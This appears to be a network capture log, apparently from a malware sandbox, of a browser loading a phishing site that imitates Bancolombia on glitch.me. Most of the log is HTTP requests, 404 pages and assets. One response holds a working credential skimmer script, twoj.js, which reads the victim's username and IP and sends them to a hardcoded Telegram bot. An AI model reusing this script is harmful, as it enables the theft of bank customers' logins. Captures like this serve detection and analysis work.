                                                                                                                          Content-Length: 3674
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]
                                                                                                                          Oct 13, 2024 18:20:41.619410992 CEST1236INData Raw: 3a 20 31 30 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: : 1000px; } @media(max-width: 620px) { .container { padding: 40px; } .decorative-image { right: 20px; bottom: 20px; width: 80vw; } } .button-wra
                                                                                                                          Oct 13, 2024 18:20:41.619426966 CEST1236INData Raw: 34 32 32 2d 30 30 62 32 64 39 32 31 31 34 32 34 25 32 46 47 6c 69 74 63 68 2d 45 72 72 6f 72 2d 52 61 69 6e 62 6f 77 2d 4d 75 67 2d 68 69 72 65 73 2e 70 6e 67 3f 76 3d 31 35 39 35 34 38 31 36 35 33 35 39 33 22 20 63 6c 61 73 73 3d 22 64 65 63 6f
                                                                                                                          Data Ascii: 422-00b2d9211424%2FGlitch-Error-Rainbow-Mug-hires.png?v=1595481653593" class="decorative-image"> </div> <script> function requestStorageAccess() { if ('requestStorageAccess' in document === false) { return Promi
                                                                                                                          Oct 13, 2024 18:20:41.619440079 CEST101INData Raw: 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6f 67 69 6e 2d 62 75 74 74 6f 6e 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 6c 6f 67 69 6e 43 6c 69 63 6b 65 64 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e
                                                                                                                          Data Ascii: ElementById('login-button').addEventListener('click', loginClicked); </script> </body></html>
                                                                                                                          Oct 13, 2024 18:21:26.619599104 CEST6OUTData Raw: 00
                                                                                                                          Data Ascii:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.4497403.219.195.73802316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 13, 2024 18:20:40.277580976 CEST363OUTGET /Casa.css HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:40.800425053 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:40 GMT
                                                                                                                          Content-Type: text/css; charset=utf-8
                                                                                                                          Content-Length: 3921
                                                                                                                          Connection: keep-alive
                                                                                                                          x-amz-id-2: d/HJP6uDKaF2mcSw6Irlz4U9NOVad4dK2gH6MPIP43CJhe1WqXP4X/m7kmTOby6rMCLc8PKjTVg=
                                                                                                                          x-amz-request-id: 44N06ZEB3P1APTDC
                                                                                                                          last-modified: Sat, 12 Oct 2024 23:58:07 GMT
                                                                                                                          etag: "9085d9901b359717ddb14e6f68003b29"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          cache-control: no-cache
                                                                                                                          x-amz-version-id: 5F8XgeNT.s6kZb.GWOt5MsOSj4AQd3WL
                                                                                                                          accept-ranges: bytes
                                                                                                                          server: AmazonS3
                                                                                                                          Data Raw: 2e 75 2d 73 65 63 74 69 6f 6e 2d 32 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 30 64 65 67 2c 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 35 35 29 2c 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 35 35 29 29 2c 0a 20 20 75 72 6c 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 32 5a 58 4a 7a 61 57 39 75 50 53 49 78 4c 6a 45 69 49 47 6c 6b 50 53 4a 6b 5a 57 5a 68 64 57 78 30 4c 57 6c 74 59 57 64 6c 4c 58 4e 76 62 47 6c 6b 49 69 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 67 39 49 6a 42 77 65 43 49 67 65 54 30 69 4d 48 42 34 49 69 42 32 61 57 56 33 51 6d 39 34 50 53 49 77 49 44 41 67 4e 44 41 77 49 44 49 32 4e 53 49 67 63 33 52 35 62 47 55 39 49 6e 64 70 5a 48 52 6f 4f 69 41 30 4d 44 42 77 65 44 73 67 61 47 56 70 5a 32 68 30 4f 69 41 79 4e 6a 56 77 65 44 73 69 50 67 30 4b 50 48 4a [TRUNCATED]
                                                                                                                          Data Ascii: .u-section-2 { background-image: linear-gradient(0deg, rgba(0,0,0,0.55), rgba(0,0,0,0.55)), url("data:image/svg+xml;base64,PHN2ZyB2ZXJzaW9uPSIxLjEiIGlkPSJkZWZhdWx0LWltYWdlLXNvbGlkIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHg9IjBweCIgeT0iMHB4IiB2aWV3Qm94PSIwIDAgNDAwIDI2NSIgc3R5bGU9IndpZHRoOiA0MDBweDsgaGVpZ2h0OiAyNjVweDsiPg0KPHJlY3QgZmlsbD0iI0M2RDhFMSIgd2lkdGg9IjQwMCIgaGVpZ2h0PSIyNjUiLz4NCjxwYXRoIGZpbGw9IiNEOUUzRTgiIGQ9Ik0zOTUuMyw5Ni4yYy01LTAuOC02LjEsMS4xLTguNSwyLjljLTEtMi4zLTIuNi02LjItNy43LTVjMS41LTUuMy0yLjYtOC40LTcuNy04LjRjLTAuNiwwLTEuMiwwLjEtMS44LDAuMg0KCWMtMS44LTQuMS02LTYuOS0xMC43LTYuOWMtNi41LDAtMTEuOCw1LjMtMTEuOCwxMS44YzAsMC40LDAsMC45LDAuMSwxLjNjLTEuMi0wLjgtMi41LTEuMy0zLjktMS4zYy00LjMsMC03LjksNC4yLTcuOSw
                                                                                                                          Oct 13, 2024 18:20:40.800440073 CEST1236INData Raw: 35 4c 6a 51 4e 43 67 6c 6a 4d 43 77 78 4c 6a 49 73 4d 43 34 79 4c 44 49 75 4e 43 77 77 4c 6a 59 73 4d 79 34 31 59 79 30 77 4c 6a 55 74 4d 43 34 78 4c 54 45 74 4d 43 34 78 4c 54 45 75 4e 69 30 77 4c 6a 46 6a 4c 54 59 75 4f 53 77 77 4c 54 45 79 4c
                                                                                                                          Data Ascii: 5LjQNCgljMCwxLjIsMC4yLDIuNCwwLjYsMy41Yy0wLjUtMC4xLTEtMC4xLTEuNi0wLjFjLTYuOSwwLTEyLjUsNS41LTEyLjcsMTIuNGMtMC45LTAuMi0xLjktMC40LTIuOS0wLjRjLTYuNCwwLTExLjcsNS4yLTEyLjUsMTEuOA0KCWMtMS4yLTAuNC0yLjUtMC42LTMuOS0wLjZjLTUuOSwwLTEwLjgsMy44LTEyLjEsOC45Yy
                                                                                                                          Oct 13, 2024 18:20:40.800453901 CEST1236INData Raw: 73 4f 54 59 75 4d 6e 6f 69 4c 7a 34 4e 43 6a 78 77 59 58 52 6f 49 47 5a 70 62 47 77 39 49 69 4d 34 52 55 45 34 51 6b 49 69 49 47 51 39 49 6b 30 30 4d 44 41 73 4d 6a 41 32 4c 6a 4a 6a 4d 43 77 77 4c 54 49 31 4c 6a 4d 74 4d 54 6b 75 4d 69 30 7a 4d
                                                                                                                          Data Ascii: sOTYuMnoiLz4NCjxwYXRoIGZpbGw9IiM4RUE4QkIiIGQ9Ik00MDAsMjA2LjJjMCwwLTI1LjMtMTkuMi0zMy42LTI1LjdjLTEzLjQtMTAuNi0yMy4xLTEyLjktMzEuNy03cy0yMy45LDE5LjctMjMuOSwxOS43cy01OC45LTYzLjktNjEuNS02Ni40DQoJYy0xLjUtMS40LTMuNi0xLjctNS41LTAuOWMtNS4yLDIuNC0xNy42LD
                                                                                                                          Oct 13, 2024 18:20:40.800467968 CEST723INData Raw: 74 4e 69 34 34 4c 44 49 35 4c 6a 63 73 4d 69 34 78 4c 44 49 32 4c 6a 46 6a 4f 43 34 35 4c 54 4d 75 4e 69 77 78 4e 43 34 32 4c 54 45 32 4c 44 45 34 4c 6a 67 74 4f 53 34 31 63 7a 45 32 4c 6a 49 73 4d 7a 67 75 4e 69 77 79 4d 53 34 35 4c 44 4d 7a 4c
                                                                                                                          Data Ascii: tNi44LDI5LjcsMi4xLDI2LjFjOC45LTMuNiwxNC42LTE2LDE4LjgtOS41czE2LjIsMzguNiwyMS45LDMzLjgNCgljNS43LTQuNywyMS40LTEzLjEsMjIuNC02LjVjMSw2LjUtMSw1LjMtNS43LDIwLjJDMjIzLjEsMjI3LjEsMjAwLDI2NSwyMDAsMjY1aC0xMGMwLDAsNi0yNC44LDguNi0zNC45YzIuNi0xMC4xLTMuNy0xOS
                                                                                                                          Oct 13, 2024 18:20:40.802264929 CEST367OUTGET /hhhhhh_files/ap.js.descarga HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:40.939666986 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:40 GMT
                                                                                                                          Content-Length: 3674
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]
                                                                                                                          Oct 13, 2024 18:20:40.939682007 CEST1236INData Raw: 3a 20 31 30 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: : 1000px; } @media(max-width: 620px) { .container { padding: 40px; } .decorative-image { right: 20px; bottom: 20px; width: 80vw; } } .button-wra
                                                                                                                          Oct 13, 2024 18:20:40.939696074 CEST1236INData Raw: 34 32 32 2d 30 30 62 32 64 39 32 31 31 34 32 34 25 32 46 47 6c 69 74 63 68 2d 45 72 72 6f 72 2d 52 61 69 6e 62 6f 77 2d 4d 75 67 2d 68 69 72 65 73 2e 70 6e 67 3f 76 3d 31 35 39 35 34 38 31 36 35 33 35 39 33 22 20 63 6c 61 73 73 3d 22 64 65 63 6f
                                                                                                                          Data Ascii: 422-00b2d9211424%2FGlitch-Error-Rainbow-Mug-hires.png?v=1595481653593" class="decorative-image"> </div> <script> function requestStorageAccess() { if ('requestStorageAccess' in document === false) { return Promi
                                                                                                                          Oct 13, 2024 18:20:40.939940929 CEST101INData Raw: 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6f 67 69 6e 2d 62 75 74 74 6f 6e 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 6c 6f 67 69 6e 43 6c 69 63 6b 65 64 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e
                                                                                                                          Data Ascii: ElementById('login-button').addEventListener('click', loginClicked); </script> </body></html>
                                                                                                                          Oct 13, 2024 18:20:41.481054068 CEST445OUTGET /archivos/logo-personas.svg HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/archivos/style.css
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:41.642684937 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:41 GMT
                                                                                                                          Content-Length: 3674
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 6c 2c 20 79 6f 75 20 66 6f 75 6e 64 20 61 20 67 6c 69 74 63 68 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6c 6f 75 64 2e 77 65 62 74 79 70 65 2e 63 6f 6d 2f 63 73 73 2f 33 61 38 65 35 35 63 36 2d 62 31 66 33 2d 34 36 35 39 2d 39 39 65 62 2d 31 32 35 61 65 37 32 62 64 30 38 34 2e 63 73 73 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <title>Well, you found a glitch.</title> <meta name="viewport" content="initial-scale=1, width=device-width"> <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css"> <style> * { box-sizing: border-box; } html, body { margin: 0; padding: 0; font-family: "Benton Sans", Helvetica, Sans-serif; font-size: 16px; line-height: 160%; width: 100%; height: 100%; } .container { width: 100%; height: 100%; display: flex; padding: 100px; } .info { max-width: 370px; z-index: 1; position: relative; } h1 { margin: 0; font-size: 40px; line-height: 130%; font-weight: bold; } a { color: #000; } .decorative-image { position: ab [TRUNCATED]
                                                                                                                          Oct 13, 2024 18:20:41.642699003 CEST1236INData Raw: 3a 20 31 30 30 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 32 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: : 1000px; } @media(max-width: 620px) { .container { padding: 40px; } .decorative-image { right: 20px; bottom: 20px; width: 80vw; } } .button-wra
                                                                                                                          Oct 13, 2024 18:20:41.642713070 CEST1236INData Raw: 34 32 32 2d 30 30 62 32 64 39 32 31 31 34 32 34 25 32 46 47 6c 69 74 63 68 2d 45 72 72 6f 72 2d 52 61 69 6e 62 6f 77 2d 4d 75 67 2d 68 69 72 65 73 2e 70 6e 67 3f 76 3d 31 35 39 35 34 38 31 36 35 33 35 39 33 22 20 63 6c 61 73 73 3d 22 64 65 63 6f
                                                                                                                          Data Ascii: 422-00b2d9211424%2FGlitch-Error-Rainbow-Mug-hires.png?v=1595481653593" class="decorative-image"> </div> <script> function requestStorageAccess() { if ('requestStorageAccess' in document === false) { return Promi
                                                                                                                          Oct 13, 2024 18:20:41.642725945 CEST101INData Raw: 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6f 67 69 6e 2d 62 75 74 74 6f 6e 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 6c 6f 67 69 6e 43 6c 69 63 6b 65 64 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e
                                                                                                                          Data Ascii: ElementById('login-button').addEventListener('click', loginClicked); </script> </body></html>
                                                                                                                          Oct 13, 2024 18:21:26.650780916 CEST6OUTData Raw: 00
                                                                                                                          Data Ascii:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.4497453.219.195.73802316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 13, 2024 18:20:41.389265060 CEST294OUTGET /twoj.js HTTP/1.1
                                                                                                                          Host: bancolombia-seguridad-co.glitch.me
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Oct 13, 2024 18:20:41.906271935 CEST1236INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:41 GMT
                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                          Content-Length: 1024
                                                                                                                          Connection: keep-alive
                                                                                                                          x-amz-id-2: RzKbUUd7ogL9Q72dBq4zVl0jm1lHUNQ4Ii5mX85/U+dv3ZScvgFoBpejkZCnfnSvUR2LzR199JuRYK0WCcv6PDzrJQxJeEj7FC+bBvRLges=
                                                                                                                          x-amz-request-id: 8SVBKN4RXB95FPJ9
                                                                                                                          last-modified: Sat, 12 Oct 2024 23:58:07 GMT
                                                                                                                          etag: "d03064f17bc24b951422778fbff213d2"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          cache-control: no-cache
                                                                                                                          x-amz-version-id: cd60LvmozOdWC56P_8VATICY15Mrw2su
                                                                                                                          accept-ranges: bytes
                                                                                                                          server: AmazonS3
                                                                                                                          Data Raw: 2f 2f 62 6f 74 20 74 6f 6b 65 6e 0a 76 61 72 20 74 65 6c 65 67 72 61 6d 5f 62 6f 74 5f 69 64 20 3d 20 22 38 30 38 35 31 33 38 34 32 30 3a 41 41 48 78 5f 4a 4e 7a 35 49 42 7a 64 53 6d 39 41 7a 37 6b 37 4d 38 31 33 34 31 52 71 77 55 63 52 78 4d 22 3b 0a 2f 2f 63 68 61 74 20 69 64 0a 76 61 72 20 63 68 61 74 5f 69 64 20 3d 20 22 37 31 30 36 34 39 32 38 31 36 22 3b 0a 76 61 72 20 75 5f 6e 61 6d 65 2c 20 69 70 2c 20 69 70 32 3b 0a 76 61 72 20 72 65 61 64 79 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 75 5f 6e 61 6d 65 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 75 73 75 61 72 69 6f 22 29 2e 76 61 6c 75 65 3b 0a 20 0a 20 20 20 20 69 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 66 67 22 29 2e 69 6e 6e 65 72 48 54 4d 4c 3b 0a 20 20 20 20 69 70 32 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 61 64 64 72 65 73 73 22 29 2e 69 6e 6e 65 72 48 54 4d 4c 3b 0a 20 20 20 20 6d [TRUNCATED]
                                                                                                                          Data Ascii: //bot tokenvar telegram_bot_id = "8085138420:AAHx_JNz5IBzdSm9Az7k7M81341RqwUcRxM";//chat idvar chat_id = "7106492816";var u_name, ip, ip2;var ready = function () { u_name = document.getElementById("usuario").value; ip = document.getElementById("gfg").innerHTML; ip2 = document.getElementById("address").innerHTML; message = "-Banc0lombia-\nUsuario: " + u_name + "\nip" + ip +"\n" + ip2 +"\n-LOGIN-";};var sender = function () { ready(); var settings = { "async": true, "crossDomain": true, "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage", "method": "POST", "headers": {
                                                                                                                          Oct 13, 2024 18:20:41.906311989 CEST344INData Raw: 20 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3a 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3a 20 22 6e 6f 2d 63 61 63 68 65 22 0a 0a 20 20 20 20
                                                                                                                          Data Ascii: "Content-Type": "application/json", "cache-control": "no-cache" }, "data": JSON.stringify({ "chat_id": chat_id, "text": message }) }; $.ajax(settings).done(function (respons
                                                                                                                          Oct 13, 2024 18:21:26.916395903 CEST6OUTData Raw: 00
                                                                                                                          Data Ascii:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.449742173.231.197.2274432316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:20:41 UTC637OUTGET /pdcc/wp-content/uploads/2024/05/Outlook.jpg HTTP/1.1
                                                                                                                          Host: newsinamerica.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-10-13 16:20:41 UTC208INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:41 GMT
                                                                                                                          Server: Apache
                                                                                                                          Last-Modified: Thu, 23 May 2024 21:53:38 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 66514
                                                                                                                          Connection: close
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          2024-10-13 16:20:41 UTC7984INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 3c 00 00 ff e1 03 31 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 66 33 35 34 65 66 63 37 30 2c 20 32 30 32 33 2f 31 31 2f 30 39 2d 31 32 3a 30 35 3a 35 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                          Data Ascii: ExifII*Ducky<1http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.f354efc70, 2023/11/09-12:05:53 "> <rdf:RDF
